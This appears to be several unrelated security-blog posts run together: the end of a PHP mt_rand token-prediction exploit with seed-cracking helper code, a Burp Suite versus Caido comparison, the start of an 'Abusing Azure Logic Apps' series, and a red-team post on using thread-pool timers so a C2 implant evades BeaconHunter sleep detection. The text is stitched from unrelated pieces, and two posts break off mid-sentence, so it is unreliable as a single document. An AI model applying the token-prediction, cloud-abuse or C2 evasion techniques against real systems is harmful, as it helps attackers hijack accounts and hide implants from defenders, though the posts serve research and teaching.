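CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

def token_to_mt_outputs(token: str) -> str:
    """Turn each token character back into the mt_rand() output that
    selected it, formatted as php_mt_seed constraints: "value value 0 61"
    per character (the value is duplicated so the tool searches for an
    exact match within the 0..61 bound)."""
    return " ".join(f"{CHARSET.index(c)} {CHARSET.index(c)} 0 61" for c in token)
```

The resulting string of quadruples is what gets passed on the php_mt_seed command line to recover the seed.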
From the attacker’s perspective, we only have access to the attacker’s token, which is F4zrX6rBBHaOadoTwsRvJddtyl5vEeif. With this information, let’s use the same attack process as before. It’s true that we found the seed, but the next seed, the one used to generate the target token, will be slightly different. Let’s see in what way. If we copy the target token, we can use the same attack to recover its seed and compare the target seed with the attacker seed: We can see that the first four digits of the seeds are the same. Now all we need to do is brute force the remainder of the seed, which is only 6 digits! Using our POC to attack: After running the POC PHP script: The attack was successful and the target token was found. This brute force covers only 1,000,000 candidate seeds and can be completed in a couple of hours. Conclusion In this blog post we exploited the PHP mt_rand function in two different scenarios and showed its exploitability in a real-world attack. In 2024, mt_rand is still used by programmers to generate random passwords, tokens, or even user IDs. The mt_rand function is not secure and puts your software at risk. If you’re looking for a good alternative, we recommend using a secure random generator function such as random_int() or random_bytes() to generate secrets, and never use mt_rand. [1] https://www.php.net/manual/en/function.mt-rand.php [2] https://github.com/openwall/php_mt_seed
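The remaining-digits brute force described above can be sketched as a simple enumeration; the names are illustrative, and a real POC would feed each candidate seed to a PHP mt_rand re-implementation and compare the generated token against the target’s:

```python
def candidate_seeds(shared_prefix: int, unknown_digits: int = 6):
    """Enumerate seeds that share a known leading portion with the
    attacker's recovered seed, brute forcing only the trailing digits.
    With 6 unknown digits this yields exactly 1,000,000 candidates."""
    base = shared_prefix * 10 ** unknown_digits
    for tail in range(10 ** unknown_digits):
        yield base + tail
```

Each candidate would then seed the generator and the resulting token would be checked for a match, stopping at the first hit.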
Burp Suite vs. Caido: Navigating the Evolving Landscape of Best Web Application Security Testing Tools
In the ever-evolving landscape of web application security testing, selecting the right tools is crucial for ensuring robust security measures. Two prominent contenders in this field are Burp Suite and Caido. Both offer free and paid versions, each catering to different needs and budgets. This article delves into a comparative analysis of these tools, examining their features, usability, and value propositions to help users make informed decisions. Understanding the Basics Burp Suite, developed by PortSwigger, is a veteran in the cybersecurity realm, widely recognized for its comprehensive toolset designed to identify and exploit vulnerabilities in web applications. Caido, on the other hand, is a relatively new entrant, offering a modern and user-friendly approach to security testing. Despite its novelty, Caido has quickly gained attention for its intuitive design and efficient workflows. Features Comparison Burp Suite is offered as a free Community Edition and a paid Professional Edition; Caido likewise comes in a free version and a paid version. Usability and Learning Curve Burp Suite is known for its robustness and reliability. However, it comes with a steeper learning curve, especially for beginners. Its extensive documentation and support are invaluable for professional users who require in-depth capabilities and advanced features. The Professional edition’s automated scanner and CI/CD integration streamline workflows, making it suitable for large-scale projects. Caido, in contrast, is designed with user-friendliness at its core. Its modern UI and intuitive features make it accessible to both beginners and seasoned professionals. The focus on ease of use does not compromise its efficiency, making it a strong contender in the security testing field. The seamless integration with CI/CD pipelines and comprehensive reporting features in the paid version enhance its usability for professional environments.
Cost-Benefit Analysis Burp Suite Professional comes with a significant cost, justified by its extensive features and support for professional use. The investment is particularly worthwhile for large-scale projects and comprehensive security testing requirements. The Community Edition, while limited, provides essential tools for small projects or learning purposes. The extensive feature set of the professional version, including advanced intrusion tools and automated scanning, makes it a top choice for professionals despite its higher price point. Caido offers a more affordable alternative without sacrificing essential functionalities. Its paid version provides enhanced automation and integration capabilities at a lower cost, making it an attractive option for budget-conscious users who still require robust security testing tools. The modern UI and user-centric design reduce the learning curve, making it accessible to a broader audience. The cost-effectiveness of Caido, combined with its advanced features, positions it as a viable competitor to Burp Suite. Conclusion Both Burp Suite and Caido bring unique strengths to the table. Burp Suite remains a top choice for its comprehensive and professional-grade features, despite its higher cost and steeper learning curve. It is particularly suited for users who need extensive support and advanced tools for large-scale security testing. The professional version’s capabilities, including the automated scanner and CI/CD integration, provide a robust solution for complex security needs. Caido, with its modern approach and user-friendly design, offers an efficient and cost-effective solution for both beginners and professionals. Its affordability and ease of use make it a compelling choice for a wide range of users, from hobbyists to seasoned security professionals. The intuitive interface and seamless integration with development pipelines enhance its usability and efficiency. 
In the dynamic field of web application security testing, the choice between Burp Suite and Caido ultimately depends on the user’s specific needs, budget, and preference for usability. Both tools have proven their worth, and understanding their nuances can help users navigate the complex landscape of cybersecurity with confidence. This article aims to provide a comprehensive, balanced view of Burp Suite and Caido, helping readers make informed decisions based on their unique requirements. By highlighting the key differences and advantages of each tool, we ensure that our audience is well-equipped to choose the best solution for their security testing needs.
Abusing Azure Logic Apps – Part 1
This will be a multi-part blog series on abusing Logic Apps. In this blog, we will cover a few scenarios showing how we can leverage our privileges on a storage account linked with a logic app to gain access to the Logic App, create a new workflow, upload code that allows us to execute system commands, and more. We will also come to understand the relationship between logic apps and storage accounts. Let’s start from scratch by first understanding storage accounts, logic apps, and their use cases. Azure Storage Accounts An Azure storage account offers a dependable and affordable solution for storing and retrieving data, regardless of its format. Azure Storage meets a broad range of storage needs, from photos and documents to movies and application data. It offers four main data storage services: tables, queues, blob containers, and file shares. Let’s discuss these services. Table Storage Azure Table Storage is a service that stores non-relational structured data (also known as structured NoSQL data) in the cloud, providing a key/attribute store with a schemaless design. Because table storage is schemaless, it’s easy to adapt our data as the needs of our application evolve. We can use table storage to store flexible datasets like user data for web applications, address books, device information, or other types of metadata that our service requires. We can store any number of entities in a table, and a storage account may contain any number of tables, up to the capacity limit of the storage account. Azure Queue Storage The Azure Queue Storage service can be used to store a large number of messages. A queue message can be up to 64 KB in size, and the queues can be accessed from anywhere in the world with authenticated HTTP or HTTPS requests. Queues are commonly used to create a backlog of work to process asynchronously. For example, when a new order comes in, it gets added to the queue, and our application picks it up, processes the order, and removes it from the queue.
Blob Storage Blob storage is an object storage solution optimized for storing massive amounts of unstructured data. Blob storage can be accessed over HTTP/HTTPS from anywhere in the world. It is designed for the following: Azure Files Azure Files is a fully managed file share in the cloud. It can be accessed via industry-standard protocols such as SMB, NFS, or the REST API. We can mount Azure file shares on Windows, Linux, or macOS clients by leveraging the SMB protocol. The NFS protocol can be used to mount the share only on Linux machines. Azure File Sync can be leveraged to cache the data of an Azure file share mounted on Windows servers via SMB. Logic Apps In the world of cloud-based automation and integration, Azure Logic Apps stands out as a powerful tool for orchestrating workflows and connecting various services and applications. In this comprehensive guide, we’ll delve into what logic apps are and how they work, and explore their capabilities with real-world examples. Azure Logic Apps is a cloud-based service that allows us to automate workflows and integrate data, applications, and systems across cloud and on-premises environments. Think of Logic Apps as our digital assistant, automating repetitive tasks and streamlining complex business processes without writing extensive code. Logic apps follow a “trigger-action” model, where a trigger initiates the workflow and one or more actions are performed in response. Triggers can be events from various sources such as emails, messages, or changes in data. Actions are the tasks performed, which can include sending emails, processing data, calling APIs, or even running custom code. Example Imagine an e-commerce platform that receives orders from customers via a web application. With Azure Logic Apps, we can create a workflow that triggers whenever a new order is placed.
The logic app can then retrieve order details, send confirmation emails to customers, update inventory in a database, and notify shipping services for order fulfillment. Getting Familiar with Logic Apps’ Standard Plan Azure Logic Apps comes in two plans, Standard and Consumption, each tailored to different needs. The Standard plan offers advanced features, such as premium connectors, Integration Service Environments (ISE), and enhanced monitoring capabilities, making it ideal for enterprise-grade automation scenarios with complex integration requirements. In simple terms, when creating a logic app with the Standard plan, an App Service plan is also created along with a storage account; on the backend, it leverages function apps. The Consumption plan follows a serverless architecture and a pay-per-use pricing model. With automatic scaling and simplified management, the Consumption plan is well suited for organizations looking for a scalable and budget-friendly solution without upfront costs. So, why are we interested in this? Well, these plans have different functionalities that we will cover in this blog series. For part 1, we will focus on Standard plan-based logic apps. As mentioned above, when we select the Standard plan, an App Service plan is created and, along with it, a storage account that syncs all the workflows and other files from the file share. This, in turn, makes the logic app vulnerable if an attacker gets read/write access to the Azure storage account. Now we might be wondering: how is that possible? To answer that question, let’s dig deeper into logic app deployment. Let’s first understand how a basic workflow is created in the logic app and then understand how it works. In the image above, the highlighted service will be created along with the Standard Logic App plan. Once created, we can make our new workflow by navigating to Workflows and selecting the Stateless state type as shown in the following screenshot.
Once created, we’ll select our workflow (“stateless1”) and navigate to Designer. As discussed above, all Logic Apps have to start with a trigger, which initiates the workflow when a specific event occurs. In both the Standard and Consumption plans, triggers can be configured to respond to various events such as HTTP requests, messages in queues, changes in data, scheduled times, etc. Once the trigger is set off, it will
Sleeping Safely in Thread Pools
A thread pool is a collection of worker threads that efficiently execute asynchronous callbacks on behalf of the application. The thread pool is primarily used to reduce the number of application threads and provide management of the worker threads. Applications can queue work items, associate work with waitable handles, automatically queue based on a timer, and bind with I/O. – MSDN | Thread Pools The red team community has developed a general awareness of the utility of thread pools for process injection on Windows. SafeBreach published detailed research last year describing how they may be used for remote process injection. White Knight Labs teaches the relevant techniques in our Offensive Development training course. This blog post, however, discusses another use of thread pools that is relevant to red teamers: their use as an alternative to a sleeping main thread in a C2 agent or other post-exploitation offensive capability. This technique has been observed in use by real-world threat actors before and is not a novel technique developed by me or White Knight Labs. However, since we have not observed public discussion of the technique in red team communities, we have determined it to be a worthwhile topic that deserves more awareness. Let us now compare the standard technique of using a sleeping thread with this alternative option. The Problem with Sleeping Threads C2 developers often face a dilemma: their agent must be protected while it is sleeping. It sleeps because it awaits new work. While the agent sleeps, all sorts of protections have been constructed to ward off dangerous memory scanners that may hunt it in its repose. Many of those mechanisms protect its memory, such as encryption of memory artifacts or ensuring the memory storage locations fly innocuous flags. Today we do not speak of memory protections, but rather of threads and their call stacks. Specifically, we are concerned with reducing the signature of our threads.
The reason C2 developers delve into the complexities of call stack evasion is that their agent must periodically sleep its main thread. That main thread’s call stack may include suspicious addresses indicating how it came to be run. For example, code in some unbacked memory, such as dynamically allocated shellcode, may have hidden the C2 agent safely in image-backed memory before executing it. But the thread that ran that agent could still keep a call stack that includes an address in unbacked memory. Therefore the call stack must be “cleaned” in some way. Using thread pools to periodically run functionality instead of a sleeping main thread avoids this issue. By creating a timer-queue timer (which uses thread pools to run a callback function on a timer), the main thread can allow itself to die, safe in the knowledge that its mission of executing work will be taken up by the thread pool. Once the sleep period has elapsed, the thread pool will create a new thread and run whatever callback function it was set up for. This would likely be the “heartbeat” function that checks for new work. The thread pool will automatically create a new thread with a clean call stack or hand off execution to an existing worker thread. Comparing the Code Let us suppose we have a simple, mock C2 agent that includes the following simplified code: This part of our code is common between our two case studies. We have a heartbeat function that is called periodically, after SLEEP_PERIOD milliseconds. The heartbeat function checks for new work from the C2 server, executes it, and then sets up any obfuscation before it sleeps again. We will use MDSec’s BeaconHunter and Process Hacker to inspect our process after using both techniques. BeaconHunter monitors for processes with threads in the Wait:DelayExecution state, tracks their behavior, and calculates a detection score that estimates how likely they are to be a beacon.
It was designed to demonstrate detection of Cobalt Strike’s implant, BEACON. Sleeping Thread Example Now suppose our agent uses a sleeping thread to wait. The simplified code would look something like this: That is the code that runs in our hypothetical C2 implant’s main thread. All it does is sleep and then run the heartbeat function once it wakes. Now we’ll run our mock C2 agent and inspect it. With Process Hacker you can see that the main thread spends most of its time sleeping in the Wait:DelayExecution state. Now let’s take a look at what BeaconHunter thinks about us: BeaconHunter has observed our main sleeping thread, as well as our callbacks on the network, and decided that we are worthy of a higher score for suspicious behavior. Thread Pool Timer Example Now let’s try rewriting our mock C2 implant to use a thread pool and timer instead. In this example we use CreateTimerQueueTimer to create a timer-queue timer. When the timer expires, every SLEEP_PERIOD milliseconds, our callback function ticktock will be executed by a thread pool worker thread. Once we have set up the timer, we exit our original thread to allow the timer to take over management of executing our heartbeat function. Another option would be to trigger the callback on some kind of event rather than a timer. For that, you may use the RegisterWaitForSingleObject function. Now that we have re-configured our mock C2 implant to use a thread pool, let’s inspect our process again with Process Hacker: This screenshot contains several interesting bits of information. Because the waiting state of our worker thread is not Wait:DelayExecution, BeaconHunter does not notice our process at all, and it is absent from the list of possible beacons: Which Thread Pool APIs Should You Use? If you read the MSDN article linked at the top, then you will know that there are two documented APIs for thread pools: a “legacy” API and a “new” API.
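The Windows-specific implant code can’t run outside Windows, but the underlying pattern (arm a timer, let the original thread return, run the heartbeat on a fresh thread) can be sketched portably. The following is a loose Python analogy using threading.Timer, which spawns a new thread per tick; it illustrates the pattern only, not the CreateTimerQueueTimer mechanism itself, and every name here is invented for the sketch:

```python
import threading

def schedule_heartbeat(heartbeat, sleep_period_s, stop_event):
    """Re-arm a one-shot timer after each heartbeat instead of parking a
    long-lived thread in a sleep; each tick runs on a fresh timer thread
    with a call stack unrelated to whoever armed the first timer."""
    def ticktock():
        if stop_event.is_set():
            return  # analogous to tearing down the timer queue
        heartbeat()
        # Arm the next tick, then let this thread die
        schedule_heartbeat(heartbeat, sleep_period_s, stop_event)

    t = threading.Timer(sleep_period_s, ticktock)
    t.daemon = True
    t.start()
    return t  # the caller can now simply return, like the exiting main thread
```

In the real technique the re-arming is unnecessary because the timer-queue timer is periodic, and the callback runs on a pooled worker rather than a brand-new thread each time; the Python version merely mirrors the control flow.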
The legacy API was re-architected in Windows Vista; before the new architecture, thread pools were implemented entirely in user mode. Now they are managed in the kernel by the TpWorkerFactory object type and are